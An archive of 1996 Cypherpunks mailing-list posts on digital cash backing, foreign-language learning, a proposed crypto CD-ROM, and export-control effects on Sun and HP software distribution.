> demolished _that_ thesis as wishful thinking, there's a parallel thesis
> that may actually be true: that _corporate environments_ have achieved
> escape velocity from civil jurisdiction, and now live in a world where
> rules & ethics are relative only to corporate culture, and "parochial"
> national laws are to be quietly ignored, knowing there's a highly-paid
> legal staff to deal with occasional embarrasments.

I believe in this parallel thesis. As was reported from the dec -95
OECD meeting in Paris:

>The statement from SHELL International is interesting.
>They can accept 'a trustworthy international key escrow
>infrastructure based on X.509 certificates' but they also
>need to 'protect their assets against Government intelligence
>gathering, organised crime, civil unrest and data privacy
>legislation obligations'.


Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 28 Mar 1996 18:39:28 +0800
To: cypherpunks@toad.com
Subject: Re: What backs up digital money?
In-Reply-To: <ad7ede961f02100418d5@[205.199.118.202]>
Message-ID: <199603280239.SAA15391@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

 > At 1:46 PM 3/27/96, Scott Schryvers wrote:

 >> Question. If e-cash were backed by gold would that make it
 >> more reliable than say the dollar?

Not necessarily.  Historically, gold emerged as the primary
currency metal because it could be processed using simple
technology, didn't wear out, and the world supply from mining it
increased at approximately 2% per year, which was a good match to
the growth rate of most economies.

The current price of gold could hardly be supported by legitimate
industrial uses of the metal, and banks in Europe have tons of
the stuff in their vaults freed up from the mass departure of the
world's currencies from the gold standard a number of years ago.

Basically, one can create monetary value for any commodity whose
supply can be controlled, usually by the folks wishing to lend it
value, by simply making a stable market in it, and having the
reputation and power to control that market in perpetuity.

The best example of this is probably the diamond market.  Here we
have a rare but intrinsically worthless material, the gem quality
diamond, which has no useful industrial applications at all,
since non-gem quality diamonds and substitutes, both synthetic
and natural, are in abundance.

Gem quality diamonds are extremely valuable, because their supply
is carefully controlled, and because of clever marketing designed
to convince every male human in North America and most of Europe
that shelling out two months salary for one is the unique and
true symbol of everlasting love.

The diamond industry has even made plans for the holographic
fingerprinting of every diamond they release, should synthetic
gem-quality diamonds ever hit the market, so that they may
continue their control of the supply of their "currency", even in
the face of a flood of absolutely identical "unsanctioned" gems.

I recall a very clever Science Fiction story I read a number of
years ago in which aliens completely destroyed human civilization
by manufacturing all the world's goods and services, and
accepting payment only in cowpies, which were subject to an
arbitrary and complicated grading system similar to that used by
modern gemologists.  One day, the aliens simply left, and human
civilization, consisting mostly by then of PhD Cowflopologists
with expertise only in interpreting swirls on lumps of shit,
promptly folded.

Before I digress to far from your original question, let me state
the point I am trying to make here.  If a entity, or group of
entities, with reputation and power to make a market, decide to
demoninate a currency using a rare commodity, it makes little
difference whether the rare commodity is near-perfect crystals of
carbon found only on land that they own, a vault filled with gold
bars, exponentiated random numbers modulo the product of two
large but closely guarded primes, or statistically unlikely
swirls in wads of digested plant material dropping from the butt
of a cow.

In all these cases, the important thing is not the commodity, but
the entities guaranteeing the market, and the perception of their
reputation and ability to support said currency in perpetuity.
Absolute control over the supply of the commodity in question
doesn't hurt either.

Indeed, US government backed e-cash would be a far more trusted
and reliable currency than gold backed currency printed by
DigiCash BV.

One good inflation-resistant indicator of whether gold is a good
value is the ratio between gold and silver prices.  Both of these
metals are mined with similar difficulty, and have similar uses
for backing currency and as coinage metals.  Historically, there
have been times when gold and silver prices were approximately
equal.

I have no doubt that if the unwashed masses were sold the notion
that gold was the single reliable inflation-proof form of wealth
they could own, and the holdings of international bankers were
sold into the hands of millions of individual citizens, a
controlled devaluation would follow, together with much chortling
and uncorking of champagne, as gold and silver prices became
nearly equal again.

As long as people who count have vaults full of the stuff, and
wish to carry it on their books as an expensive asset, it will of
course continue to have its current inflated value, and nothing
will be done to depress the market.  In that sense gold is a
reliable asset, as long as most of the little people refrain from
jumping on the bandwagon.

 > No form of digital money extant is an actual currency in
 > the conventional sense. Nor does this seem likely. Nor
 > necessary. Nor useful. Nor important.

Actual currency can circulate forever in the economy without
eventual conversion into some other kind of money.  The
requirements of current digital cash systems for centralized
clearing to eliminate double spending and to mint new coins tends
to preclude the kinds of perpetual peer-to-peer transactions we
think of when we conceptualize "currency."

Real electronic currency could be invented, but would have to
live its life within a population of tamper-proof smart cards
communicating with each other through secure protocols.  Whether
anyone will bother to implement such a system remains to be seen.

Until then, the "check" model of digital money is, as Tim points
out, the correct one.

 > The point being that talking about "what backs up digital
 > cash?" is misleading. (What really backs it up is the
 > reputation of the entities, but I digress.)

"The reputation of the entities" is the only important
consideration regardless of what the cash is denominated in. In
most cases, the valued commodities, if they exist, are simply
pretty window-dressing for some unseen but powerful syndicate.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Thu, 28 Mar 1996 18:48:28 +0800
To: "cypherpunks@toad.com>
Subject: RE: What backs up digital money?
Message-ID: <01BB1C0E.90D4B6C0@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Hal

So I view dcash as a circulating currency, where the act of transfer in
some implementations requires some technical assistance from an agent
of the bank able to make digital signatures on its behalf.  It is more
than simply a mechanism for transferring funds from one account to
another (unless you think of government currency in those terms).  I
view it as possessing real value, as being a genuine asset in the same
sense as other forms of cash.
..................................................................................

Real money may need to be actually in existence somewhere in the form of metallic bars or coins, but I was thinking about how most of the time for me it is just a lot of abstract Money Mumbers:

.  I get automatic deposits of Money Numbers in my bank account;

.  I go to the ATM and enter a few Money Numbers and get some representative notes, as well as a slip of paper telling me how many Money Numbers I have left in my account;

.  I go to the store and use a card which debits my account with a certain quantity of Money Numbers;

.  I promise to work for a certain quantity of Money Numbers;

.  I request loans in terms of a certain quantity of Money Numbers, etc.

Except for when I have metallic coins in my hand, t's mostly abstract and becoming more-so, so that at the accelerating speed of the circulation of Money Numbers, only the banks must be concerned over whether these are really attached to anything solid and physically meaningful.  For me and others, it's based mostly on the supposition of value (itself an abstract concept which must be learned and understood in its relation to symbolism).

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@netcom.com (Matthew Ghio)
Date: Fri, 29 Mar 1996 07:52:02 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto CD
In-Reply-To: <2.2.32.19960324211510.00908844@mail.teleport.com>
Message-ID: <199603280253.SAA12157@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


alano@teleport.com (Alan Olsen) wrote:

>It would be a nice thing to have if it is reletivly complete.  Hopefully it
>can be created with a minimum of government interfearence.  (But then, I
>have been xpecting alt.binaries.crypto to be created as well...)

alt.binaries.warez.crypto has existed for a long time (at least on Netcom),
although I haven't seen any posts lately.  I suspect many sites deliberately
exclude alt.binaries.warez.* to save disk space.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark (Mookie) <mark@zang.com>
Date: Fri, 29 Mar 1996 11:32:24 +0800
To: cypherpunks@toad.com
Subject: Sun patch pulled
Message-ID: <199603280505.TAA13153@zang.com>
MIME-Version: 1.0
Content-Type: text


>I noticed that Sun's latest libc patch (101759-04) is empty.  Previous
>versions contained the complete U.S. version of libc, including the
>tres-dangerous DES and crypt functions.  In the current rev only the
>README remains, presumably because:
>	EXPORT INFORMATION: This patch includes code which performs
>	cryptographic functions, which are subject to U.S. export
>	control, and must not be exported outside the U.S. without
>	prior approval of the U.S. government.  Prior export approval
>	must be obtained by the user of this patch.

The 101759-?? patch is missing from the Feb 1996 SunSolve Patches CD. However
if one pops in the November 1995 Patches CD there is a nice little copy of
the 101759-03 patch which also comes with the above warning and the DES
enabled libraries.

The Patches CD's are openly sent around the world by Sun Support, one CD
for all the world.

Cheers,
Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Fri, 29 Mar 1996 11:35:41 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto CD UpDate
In-Reply-To: <Pine.HPP.3.91.960327172720.11135C-100000@cor.sos.sll.se>
Message-ID: <960327.200428.2c6.rnr.w165w@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, asgaard@sos.sll.se writes:

>
>
>> A nice advantage of CD-ROMs is that many BBSs that aren't plugged into
>> the net use them. I rememebr showing threads about a similar C'punks
>
> Suppose strong crypto is outlawed in all OECD countries by dec -96.
> The known international sites with more or less complete coverage
> today amount to a handful. They will be shut down pronto. Of course
> lots of private persons have a lot of crypto files hanging around,
> but a widely distributed CD-ROM, easily put up as a BBS partition,
> wouldn't make the situation worse.

Excellent point!

I want one of those CDs!
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMVnzzBvikii9febJAQHTBQP/fChoHXEzzDu0MVNbw4+BfX24fzPyaJO4
eUKK5i1tas73moo0EbaL2L3tN1OsTMQ6aUXjORdTmaKurRYeL5G09MtNBPYy/OZf
+z0Vg2xOALkmOyeh+Ikmlsz/MtPNgcTMQsW4TXtaWk6G1mFswKzg1CS5KheO5KgQ
dnHeCvliJ2A=
=80/t
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Mott <thecrow@iconn.net>
Date: Fri, 29 Mar 1996 04:37:07 +0800
To: cypherpunks@toad.com
Subject: RC4 implementation questions
Message-ID: <3159E690.5526@iconn.net>
MIME-Version: 1.0
Content-Type: text/plain


I just finished coding RC4 from the algorithm described in applied 
crypto 2nd edition.  Could someone send me a little file encrypted with 
a know-to-work rc4 program so I can see if mine is working right? thanks 
a lot.
-- 
thecrow@iconn.net
"It can't rain all the time"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Mar 1996 07:58:41 +0800
To: cypherpunks@toad.com
Subject: Re: Why Americans feel no compulsion to learn foreign languages
Message-ID: <ad7f3f2c26021004c9f1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:37 PM 3/27/96, Alan Bostick wrote:
>In article <ad7e4b691902100484d7@[205.199.118.202]>,
>tcmay@got.net (Timothy C. May) wrote:
>
>> Americans are typically thousands of miles away from those speaking
>> Japanese, Mandarin, Tagalog, Polish, Italian, Dutch, Spanish, Hindi,
>> Talegu, and the hundreds of other languages. It is not at all clear what
>> language Americans should pick as a "second language" to study.
>
>What continent do you live on?  As I write this my next-door neighbor's
>stereo is blaring out music in Yoruba.  When I took my mother to the

Your point being? My point was not that America is monolingual but that, in
fact, the polyglot nature makes no particular language or small group of
languages stand out as a compelling candidate for study.

You want to study Yoruba, fine. It might be interesting. It might help you
to follow the lyrics of your neighbor's music. But I don't find it
compelling to study in the same way that English is important to study.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Mar 1996 07:56:54 +0800
To: cypherpunks@toad.com
Subject: Re: unsubscrive
Message-ID: <ad7f41ad28021004608a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:13 PM 3/27/96, Maurizio wrote:
>unsubscrive cypherpunks

Ah, a new spelling to be added to the archives. So far, we've got:

undescribe

unscribe

unsubbscribe

The penalty for not paying attention being continued receipt of 50 mail
messages a day!

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Mar 1996 07:58:48 +0800
To: cypherpunks@toad.com
Subject: Re: Let's *NOT* "Raise their Awareness"
Message-ID: <ad7f43b629021004db07@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:23 AM 3/27/96, Charles Bell wrote:

>Yes, and some years ago a State legislature (I forget which) passed a
>resolution setting the value of pi at exactly 3.  I'm not sure how they
>planned to enforce their will.  Do you know how the Texas judge means to
>enforce his?

By the way, this is a wonderful story to tell about the stupidity of
government, but, alas, most of it is urban legend. The Tennessee or
Kentucky (I forget which) state legislature did not actually pass such a
law....it was merely _proposed_ by some particular legislator, and then
never acted upon.

(I suspect an Alta Vista search might turn something up on this.)

As to the Texas court order...all sorts of restrictions are often imposed
in divorce custody cases (which this is). Sometimes it's that a child shall
not be exposed to second-hand smoke from one of the spouses (this has
happened here in California, such restrictions, that is), sometimes it's
other things.

Enforcement is by testimony of the child and reporting of violations to the
court. Child Protective Services probably has no involvement.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 28 Mar 1996 17:49:10 +0800
To: cypherpunks@toad.com
Subject: Re: Why Americans feel no compulsion ...
Message-ID: <ad7f454f2a0210043b38@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:21 AM 3/28/96, Syed Yusuf wrote:
>If a person who speaks three languages is tri-lingual
>If a person who speaks two languages is bi-lingual
>
>What do you call a person who only speaks one language?
>
>---------------------answer follows:
>
>An American.

Or our version:

What do you call a person who has to learn English as a second language in
order to compete in the world?

A foreigner.


(Sorry for the insult, but it seems that this thread is bringing out
insults from foreigners of all sorts.)

--Tim



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 29 Mar 1996 20:45:42 +0800
To: cypherpunks@toad.com
Subject: Re: What backs up digital money?
Message-ID: <199603280546.VAA02513@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I have to disagree somewhat with a few points Mike made.  I would say
that gold and diamonds do have intrinsic value, based on their beauty
and the desire of people to own them.  I think it is too simplistic to
denigrate these desires as the product of advertising.  The feelings that
people have which make them desire these things are as legitimate as
other forms of desire.

Along these lines, I think one of the factors which made gold and
silver coins accepted as money was their intrinsic value.  Even without
being certain that another person would take the coin, a person might
accept payment in such a coin because of its inherent value to him.
Other early forms of money, such as beads or tobacco, also had
intrinsic value in their time and place.

One area I would agree with Mike is that these items may not always
retain their value, since part of it is psychological.  And as with any
other commodity, if new supplies became available their value would
fall.  This might be especially pronounced with gold and diamonds since
part of their value is due to their intrinsic rarity.  Diamonds as
common as glass would not be worth much more.  (Of course, government
money as common as paper is worth the same as well, as hard experience
has taught us.)

A particular issue of "digital cash" could be denominated or backed by
anything the issuer thinks there is a market for.  Gold backed digital
currency would have certain advantages and disadvantages.  Currency could
be backed by a basket of commodities, or a synthetic average of several
countries' currencies.  You would not exchange your dcash for a bushel of
wheat and a barrel of oil, but rather for dollars or pounds equal to the
market value of these commodities.  These and more elaborate possibilites
are no more difficult to imagine than mutual funds or stock market
index futures, not to mention the more complex synthetic investments.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 29 Mar 1996 11:29:05 +0800
To: cypherpunks@toad.com
Subject: Re: What backs up digital money?
Message-ID: <199603280558.VAA00137@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  6:39 PM 3/27/96 -0800, Mike Duvos wrote:
>Real electronic currency could be invented, but would have to
>live its life within a population of tamper-proof smart cards
>communicating with each other through secure protocols.  Whether
>anyone will bother to implement such a system remains to be seen.

Sounds like the Mondex system, so I guess someone already has.  I think the
url is www.mondex.com, but I could be wrong.

Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Fri, 29 Mar 1996 20:44:32 +0800
To: os <os@cs.strath.ac.uk>
Subject: Re: Why Americans feel no compulsion to learn foreign languages
In-Reply-To: <31595F37.2781@cs.strath.ac.uk>
Message-ID: <Pine.3.89.9603272237.A8448-0100000@netcom3>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 27 Mar 1996, os wrote:
	
	TCMay wrote

> >There is not a single foreign language I can think of it that would help me
> >in my goals or help anyone I know. 
	
	Oyvind wrote

> I have never known anyone being disadvantaged by knowing another 
> language than their mother tongue.

	I'd say Oyvind is right. 

	If you can't speak Spanish the only jobs available in
	Southern Florida are with the federal government.

	If you can't speak French, you can't get a job in 
	northern New Hampshire, or northern Vermont. 

	One other advantage to knowing a language other than
	English.  Legal encryption.  << Unless a federal law
	bans the
	use of any language other than English for any purpose,
	which would be a violation of NAFTA, not that the US hasn't 
	allready violated NAFTA. >> 
 
	So if the use of encryption is banned, just switch to writing
	everything in something like Xhosa, or Chinese, using the
	Wade Giles transliteration, or Dervish.  << Heck, do all
	your important stuff in languages like that, and then 
	encrypt it with PGP.  Would the cryptanalysts recognise
	the plain text, even if they had it?  >> 


        xan

        jonathon
        grafolog@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Thu, 28 Mar 1996 13:01:23 +0800
To: cypherpunks@toad.com
Subject: Sun patch pulled (was Re: HP & Export of DCE)
Message-ID: <199603272316.XAA13429@pangaea.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


I noticed that Sun's latest libc patch (101759-04) is empty.  Previous
versions contained the complete U.S. version of libc, including the
tres-dangerous DES and crypt functions.  In the current rev only the
README remains, presumably because:
        EXPORT INFORMATION: This patch includes code which performs
        cryptographic functions, which are subject to U.S. export
        control, and must not be exported outside the U.S. without
        prior approval of the U.S. government.  Prior export approval
        must be obtained by the user of this patch.

So, you might ask, what fixes is Sun not distributing???
    (Rev 04)
        1190985 gethostbyname() can trash an existing open file descriptor.
        1182835 portmapper silently fails with version mismatch by PC-NFS
                client
        1219835 Syslog(3) can be abused to gain root access on 4.X systems.

Yup, that's right.  The syslog hole that was so well publicized by
CERT will remain open indefinitely because the ITAR makes it illegal
for Sun to distribute the fix!

So did HP and Sun spontaneously, simultaneously develop crypto awareness,
or is some gummint dweeb whispering threats in their ear?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 29 Mar 1996 20:45:49 +0800
To: perry@piermont.com
Subject: Re: Edited Edupage, 24 March 1996
In-Reply-To: <199603271534.KAA02331@jekyll.piermont.com>
Message-ID: <315A3ECA.6E53@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> 
> Jeff Weinstein writes:
> > >         Any possibility that Netscape might build in some form of
> > >         cryptography?
> > > I realize ITAR rules would make this problematic, but perhaps some sort of
> > > out-of-country deal for putting in the hooks for PGPhone could be done.
> >
> >   The internet phone software is coming from one of the companies that
> > we are acquiring.  This is one obvious application of SSL that I will be
> > looking into after the merger is complete.
> 
> 1) I strongly suggest that SSL is *not* in its current form the right
>    technology, because internet phone type tools probably use UDP, not
>    TCP.

  I guess that is what I get for posting when too tired.  Certainly the
current SSL won't work for UDP based protocols.  Either we will have to
make a UDP version of SSL or use some existing protocol that gets the job
done.  Since our acquisition is not complete I haven't really had an
opportunity to talk to the streaming media guys yet...

> 2) I strongly hope that Netscape tries to move the product towards
>    standards based mechanisms like the IETF's RTP protocol, which are
>    in widespread use, rather than pushing yet more proprietary
>    systems. Proprietary is bad in this instance. I believe, by the
>    way, that several existing RTP implementations have encryption in
>    them.

  Here is a quote from a recent press release - "The Netscape LiveMedia
framework will be based on the Internet Realtime Transport Protocol (RTP),
RFC number 1889...".  The full release can be found at:

	http://home.netscape.com/newsref/pr/newsrelease81.html

I believe that the current product (which was developed by a company that we are
acquiring) will be migrated to RTP as soon as we can do it.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 29 Mar 1996 20:44:52 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto CD
Message-ID: <2.2.32.19960328073312.0096faa8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:53 PM 3/27/96 -0800, Matthew Ghio wrote:
>alano@teleport.com (Alan Olsen) wrote:
>
>>It would be a nice thing to have if it is reletivly complete.  Hopefully it
>>can be created with a minimum of government interfearence.  (But then, I
>>have been xpecting alt.binaries.crypto to be created as well...)
>
>alt.binaries.warez.crypto has existed for a long time (at least on Netcom),
>although I haven't seen any posts lately.  I suspect many sites deliberately
>exclude alt.binaries.warez.* to save disk space.

I notice that Netcom takes *EVERYTHING*.  (Including the incredibly bogus
and silly groups.)  Teleport has never, to my knowledge, taken that group.  

Teleport has since removed all of the remaining warez groups in an effort of
moral excess.  (After taking all of the groups in existance, including the
forign ones that nobody on Teleport reads, and claiming they did not censor
groups.)  Personally I could care less about the warez groups (it is not as
if you could ever find a complete program), but the crypto one would have
been nice to see...
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Fri, 29 Mar 1996 20:46:23 +0800
To: Henry Huang <hwh6k@fulton.seas.virginia.edu>
Subject: Re: Crypto CD UpDate
In-Reply-To: <199603271810.NAA75303@fulton.seas.Virginia.EDU>
Message-ID: <Pine.3.89.9603272305.A8448-0100000@netcom3>
MIME-Version: 1.0
Content-Type: text/plain


	
	Henry:

On Wed, 27 Mar 1996, Henry Huang wrote:

> On Mar 26, 21:18, Timothy C. May wrote:
> > At 10:16 PM 3/26/96, aba@atlas.ex.ac.uk wrote:
> > >The idea of putting together a CD with crypto stuff is an excellent

> ITAR is going to be a mess either way.  If the CD is put together outside
> the U.S., you'd have to only use non-U.S. executables/source (or else

	Develop it ad cut it outside the US.  << Can it be done in 
	St Pierre? Alternatively, how about Bermuda?   >> 

	Include Source code for both US and Non-US versions, but
	only executable for non-US versions.  

> target.  But how do you sell a piece of software to an audience that
> doesn't know it needs it?

	It doesn't take much.  The hard part is configuring a system
	for the user. 

	Plug and Play Crypto applications are required.
	
	Now if the CD-Rom had all the crypto applications, with
	examples of how to configure various things, you are a step
	closer towards the plug & play requirement. 

> to resolve.  The multi-platform stuff (DOS/Mac/**IX on one disc) will
> be harder; you'll need to code a different interface to the CD for each
> platform.

	Depends on your search engine.  

> issue being addressed here (getting easy-to-digest crypto to the masses)
> is a lot more difficult than just pressing a CD-ROM.  Ben may need to
> rethink his strategy on this, in terms of how to most effectively promote
> this CD to that market.

	Trial run -- press, say 20 CD-Roms.  Have people
	use them on various platforms, and provide the examples,
	etc, to make it plug and play for the rest of the world.
	
	Then press them in batches of 100,  or 500 to sell 
	/distribute to users.  Market it on a web page, and
	accept the various forms of digital currency, credit
	cards, etc.  

> Hmm, do I hear a volunteer for writing that Crypto Software Web page?  ;)

	Just for the links to each of the crypto software archives?

	It would need somebody playing with alta-vista, etc for
	a while --- or somebody sending URL, and a brief site
	description, to maintain such a page.  

	I started to do something like that a long time ago, but
	got involved in some other projects.  << The relics of
	that can be found at 
	ftp://ftp.netcom.com/pub/gr/graphology/private.html
	>> 

	<< If I knew of any easy way to sort mail with stuff
	to be added to such a webpage, from the rest of my mail,
	I'd volunteer.  >> 	

        xan

        jonathon
        grafolog@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Thu, 28 Mar 1996 14:22:46 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199603272255.XAA18678@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


::
Subject: HP ships full DCE internationally

As I sit, somewhere not in North America, I can see a CD-Rom from
Hewlett-Packard, which I've had since last year. Recently I received the
following letter. I've attempted to retype its contents accurately.

---------8<--------8<--------8<--------8<--------8<--------8<--------8<

					[HP Logo]
Hewlett-Packard Company
Software and Information Delivery Operation, SST
690 East Middlefield Road
Mountain View, California 94043
415/968-9200


Dear HP-UX Support Customer,

Hewlett-Packard has uncovered a bundling problem in the DCE-Core fileset
that is on the October HP-UX Application Release 10.0 s700/800
Application CDs. These products were bundled such that they are not
compliant with U.S. Government export regulations. The part numbers for
the affected CDs and products are listed below.

If you have updated your systems using these CDs or for the products
listed on the October HP-UX Application Release Media, please update
your system with the enclosed January HP-UX Application Release 10.0
s700/800 Application media, and destroy the October media.

If you have not updated your systems with this media, please just
destroy the October Application Release media and use the new enclosed
Application media.

If you require a replacement for the October HP-UX 10.0 s700/800
Application CD that has this bundling problem corrected, please contact
your local support office to request shipment of the new CD.

Hewlett-Packard apologises for any inconvenience you may experience due
to this bundling issue.

Sincerely
[signed]
Charles Henderson
Software Information and Delivery Operations

CD PART NUMBERS
---------------
24998-11710	SE application s700 10/95
24998-11711     SE application s800 10/95
B3782-10054	Trade application s700 10/95
B3920-13614	Trade application s800 10/95

PRODUCT NUMBERS
---------------
10.01 800  B3191A	DCE CORE SRV MEDIA/DOCU INTL
10.01 800  B5162AA	DCE 9000 Executive Client
10.01 800  B3519AA	DCE QUICK START KIT INTL S800
10.01 800  B3923AA	CICS/9000 Bundle Media & Manuals, Int'l
10.01 700  B2921A	DCE Core Services International
10.01 700  B5162AA	DCE 9000 Executive Client S700
10.01 700  B3519AA	DCE Quickstart 700 Bndl Int'l

				Document P/N: 5964-5231

---------8<--------8<--------8<--------8<--------8<--------8<--------8<

Excuse me, I just have to go and destroy that CD :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@mailhost.infi.net>
Date: Fri, 29 Mar 1996 11:27:22 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why Americans feel no compulsion to learn foreign languages
In-Reply-To: <ad7e4b691902100484d7@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960328000006.9153C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Certainly, one can _get along_ as a tourist using only English. If you 
like to travel among large crowds of American tourists along well-worn 
tourist migration routes, go ahead and do it, I say.

"Where the rabble also drink, all wells are poisoned" - Nietsche




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@mailhost.infi.net>
Date: Thu, 28 Mar 1996 19:36:41 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: What backs up digital money?
In-Reply-To: <199603272304.PAA26037@jobe.shell.portal.com>
Message-ID: <Pine.SV4.3.91.960328001046.9153E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I will put forth the proposition that Federal Reserve "Notes" are not 
notes.

A note is a promise to (a) pay
                       (b) a certain amount
                       (c) at a certain time
                       (d) to a certain person.

As in the phrase that *used to* appear on United States Currency:  "will 
pay the Bearer One Dollar in Silver upon Demand".  The only extant legal 
definition of a dollar is a Federal statute of 1792, defining it as a 
certain weight of pure silver.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Thu, 28 Mar 1996 20:20:24 +0800
To: cypherpunks@toad.com
Subject: Re: unsubscrive
Message-ID: <2.2.32.19960327182004.00687d90@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


>X-Sender: tcmay@mail.got.net
>To: cypherpunks@toad.com
>From: tcmay@got.net (Timothy C. May)
>Subject: Re: unsubscrive
>Sender: owner-cypherpunks@toad.com
>
>At 7:13 PM 3/27/96, Maurizio wrote:
>>unsubscrive cypherpunks
>
>Ah, a new spelling to be added to the archives. So far, we've got:
>
>undescribe
>
>unscribe
>
